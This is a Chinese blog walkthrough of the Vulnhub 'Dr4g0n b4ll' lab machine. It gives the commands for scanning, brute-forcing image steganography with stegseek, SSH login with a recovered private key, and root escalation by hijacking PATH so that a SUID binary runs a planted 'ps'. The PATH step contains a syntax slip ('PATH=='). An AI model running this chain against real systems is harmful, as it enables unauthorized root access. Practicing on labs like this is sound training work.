Dr4g0n b4ll靶机

最新推荐文章于 2024-09-08 16:25:03 发布
最新推荐文章于 2024-09-08 16:25:03 发布
阅读量238 收藏 7
点赞数 4
文章标签: 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yuer422/article/details/136500530
版权

Dr4g0n b4ll靶机

下载地址

扫描发现主机IP 并扫描其端口

发现靶机 IP 为10.4.7.133

nmap -A -p- 10.4.7.133

扫描出开放了 22、80端口

发现相关信息

访问网页
在这里插入图片描述打开网页源码又发现一串 base64 编码

在这里插入图片描述

1. 敏感目录扫描
dirb http://10.4.7.133

发现 robots.txt

进行访问

发现一串 base64 编码

在这里插入图片描述

2.base64 解码

两种方式

(1)网页工具

搜索解码工具即可

在这里插入图片描述找到了一个隐藏目录

在这里插入图片描述

(2)输入命令
echo "eW91lGZpbmQgdGhllGhpZGRlbiBkaXI=" | base64 -d

在这里插入图片描述

DRAGON BALL

👇

这个应该是隐藏目录 进行访问
在这里插入图片描述从这个目录下 发现有一个文件夹 一个 txt文件 一张图片 还有一个登陆界面
在这里插入图片描述在这里插入图片描述

在这里插入图片描述

3. 图片隐写爆破

有一张图片 可能存在图片隐写

将网页图片保存下来

然后输入👇

stegseek aj.jpg top1000.txt

## 工具名称  准备bp的图片名称   密码字典

在这里插入图片描述密码成功爆破 并创建一个文件

在这里插入图片描述该文件为 私钥文件

4. ssh 免密登录

由于在前面发现有一个登陆界面

welcome to xmen

xmen 可能为 用户名

然后输入👇 先给私钥进行赋权 但不能太高

chmod 700 id_rsa

然后进行免密登录

ssh -i id_rsa xmen@10.4.7.133

在这里插入图片描述成功登录

登陆成功查看文件local.txt

在这里插入图片描述成功获取到一个 flag

5. 提权

查看到 script目录的属组属主都为root

在这里插入图片描述
进入目录后发现有一个带有suid的一个可执行文件
尝试查看 并执行

在这里插入图片描述
大致意思就是可以使用root权限执行 ps 的命令

查看到根目录发现只有tmp有写入权

在tmp文件下将"/bin/bash"写入文件ps中,为了使任何目录下都可以执行ps所以将tmp目录添加到环境变量中

cd /tmp                       # 切换到 tmp 目录

echo "/bin/bash" > ps         # 将 /bin/bash 重定向到 ps

chmod 777 ps                  # 给 ps 文件赋予最高权限

cd                            # 切换到 家目录

export PATH=="/tmp:$PATH"     # 将 /tmp 添加到环境变量中

echo $PATH                    # 查看环境变量是否成功添加

在这里插入图片描述全部弄完之后

再去执行 shell

./shell

成功进入 root 用户

切换到 root 家目录 找到最后的 flag

cd /root

cat proof.txt

在这里插入图片描述

总结
  1. base64 解码的两种方式 网页工具 或 命令行
  2. stegseek 工具 图片隐写爆破
  3. ssh 私钥 ssh 免密登录
  4. 添加环境变量的方式(export PATH==“(目录目录名称:)$PATH”)
Yuer422
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【vulnhub——Dr4g0n b4ll 靶机
jieli0901227的博客
05-24 812
通过nmap 端口扫描开放端口为22,80 扫描开放端口服务的版本 通过查看没有可供利用的版本信息漏洞 从目前的收集的信息,版本也没有可以利用的漏洞, 22 端口也没有有效的凭据 ,只能从web 入手了访问查看是个静态页面,没发现什么有用信息 源代码中发现 字符串 解码后 这个字符串“”DRAGON BALL ” 暂时没什么用,先留着 查看是否有有robots 文件 robots .txt 出现 字符串尝试解码能得到什么 他提示我发现隐藏目录 那之前发现的“”DRAGON BALL “ 是目
Dr4g0n-b4ll靶机总结
qq_45301512的博客
01-29 484
靶机下载地址:打开靶机,使用nmap扫描靶机的ip和所有开放的端口可以看到靶机开放了80端口和22端口根据80端口打开网站信息收集,目录爆破在robots.txt下发现一串base64编码解码之后,显示你发现了隐藏的目录,但是这个隐藏的目录还不知道在哪这里要么得需要字典好,能够跑出来要么就可能作者给出提示然后通过查看源代码,发现在源代码的最下面,有一行base64编码经过三次解码之后获得了DRAGON BALL这个东西很有可能就是隐藏目录。
Dr4g0n b4ll--龙珠靶机
懂系长
06-09 222
Dr4g0n b4ll---龙珠靶机
vuln靶场--Dr4g0n-b4ll
bobo_milk的博客
05-13 633
目录 一、信息收集 二、漏洞发现 三、权限提升 总结 一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 ​​​​ nmap -A -v -T4 -p 1-65535 192.168.216.146 可以看到服务器开启了80端口和22ssh的端口以及一些服务器的信息,网站搭建的中间件以及版本等等信息。 二、漏洞发现 访问服务器的80端口 一个...
靶机Dr4g0n b4ll: 1
weixin_50339323的博客
08-02 402
靶机信息: 渗透流程: 扫描存活的主机 扫描端口 访问该IP网页 用gobuster扫一下目录 访问一下robots.txt 得到一串base64编码 将其解码 解码后得到信息为:需要找到隐藏的目录 查看源码,一直往下拉会又是一个base64编码 将其多次解码都得DRAGON BALL 想必这个就是隐藏目录 试图访问此目录 查看是否有重要信息 一张图片应该存在隐写 一个登陆页面 将图片下载...
vulnhub靶机 DR4G0N B4LL: 1 渗透笔记
a1176905843的博客
07-12 508
vulnhub靶机 DR4G0N B4LL: 1 渗透笔记前期准备信息搜集合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 渗透笔记) 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown
vulnhub靶机Dr4g0n b4ll :1渗透笔记
m0_64122957的博客
05-17 998
https://note.youdao.com/s/aFd9cC57https://note.youdao.com/s/aFd9cC57
红队打靶:DR4G0N B4LL打靶思路详解(vulnhub)
Bossfrank的博客
02-28 1397
本文是vulnhub靶机DR4G0N B4LL:1的详细思路与打靶过程。涉及到的知识点有:常规Web渗透思路、使用脚本进行字符串处理、curl批量访问、stegseek图片隐写破解、变量劫持提权等。
Dr4g0n b4ll: 1 ~ VulnHub
小小猪的博客
09-16 506
进入script目录,查看文件,并运行,第一个为运行ps的源码,shell为运行ps命令。nmap命令进行服务端口扫描,发现开放22和80端口。查看id,已经是root用户权限,查看flag文件。删除这个文件,不然会连接不上,ssh密钥进行连接。访问login.html这个网址,发现用户名。进行suid提权,编辑环境变量,运行文件。扫描该网站目录,发现一些文件以及路径。访问该目录,发现一个文本一个文件夹。访问80端口,发现是一个网站。查看保存后的文件,发现是密钥。查看源码,发现一串字符。
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
VulnHub-Tr0ll1靶机实战
千寻的博客
01-12 602
靶机下载地址 https://www.vulnhub.com/entry/tr0ll-1,100/ 环境: Vmware 15.5 靶机地址:192.168.246.128 kali地址:192.168.246.131 第一部分 信息收集 第一步 进行端口扫描,去发现存活主机,发现主机开放21、22、80端口 namp -sP 192.168.246.0/24 nmap -sS -sV -TS -A -P- 192.168.246.131 第二步 访问80端口 第三步 只能
Tr0ll靶机练习
SYJ_361的博客
03-27 2934
本文是对Tr0ll靶机的练习,利用ftp漏洞进行远程登录,利用python生成反弹shell的脚本,并通过远程进行下载,并对靶机进行提权,最终获得root权限
tr0ll靶机渗透
weixin_43070384的博客
06-19 747
. 发现目标靶机IP地址,然后可以得出目标网站的IP地址,所以通过IP地址登陆网站。 nmap -sP 192.168.xxx.0/24 2. 得到目标靶机的ip地址后,用浏览器登陆目标IP,发现是一张图片! 3. 然后我们遍历目录,查找敏感路径。 4. 通过遇见扫描出地址登陆 robots.txt 5.登陆192.168.111.131/secret/index.html(本能应激登陆) 6.扫服务发现开启了ftp服务 7.已知ftp服务打开了,所以干他娘的,二营长把我的意大利炮抬出来...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8455
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Linux 进程控制
最新发布
2302_77289177的博客
09-08 1096
Linux 进程控制
Linux> 基础IO
prodigy623的博客
09-06 962
详解Linux基础IO:文件系统调用接口与C库文件函数的关系、重定向、数据缓冲区、文件系统、动静态库
Linux 下 C/C++ 程序编译的过程
Teminator_的博客
09-08 6249
本文将介绍如何将 C/C++ 语言编写的程序转换成为处理器能够执行的二进制代码的过程,包括四个步骤:预处理()编译()汇编()链接(在此之前,首先来看一下 GCC 工具链。
Linux】地址空间
Hello World!
09-07 1222
有一天,小明睡觉的时候不小心越过了三八线,于是他按照规定,将三八线向自己移动了 10 cm,他的课桌区域变为了 40 cm长,小红的课桌区域变为了 60 cm长。此时,私生子都向大富翁申请了一笔金额:A 申请了 2 万,B 申请了 10 万,C 申请了 2k,D 申请了 900。不可以,因为此时的 g_val 是父子共用的,如果修改后父进程又拿 g_val 参与运算,就会影响到父进程的运行,破坏了。如果进程直接与内存进行交互,万一发生越界修改数据了,不仅会对此进程造成影响,还可能会导致其他进程的崩溃。
网络安全攻防靶机建设方案
"网络安全攻防靶机的设计概要涵盖了项目背景、目标、技术和实施细节,旨在构建一个逼真的网络攻防训练环境,以提升信息安全人员的实战能力。该项目由国网xxx电力有限公司xxx供电公司发起,由安徽凌慧信息科技有限...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值